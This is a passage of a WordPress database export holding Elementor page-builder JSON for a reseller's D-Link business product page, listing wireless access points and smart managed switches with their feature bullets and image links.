\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7184,3355,'_elementor_version','2.5.14'),(7185,3355,'_elementor_edit_mode','builder'),(7188,3356,'_wp_page_template','template-fullwidth.php'),(7189,3356,'_elementor_template_type','post'),(7190,3356,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"317\",\"right\":\"317\",\"bottom\":\"317\",\"left\":\"317\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot 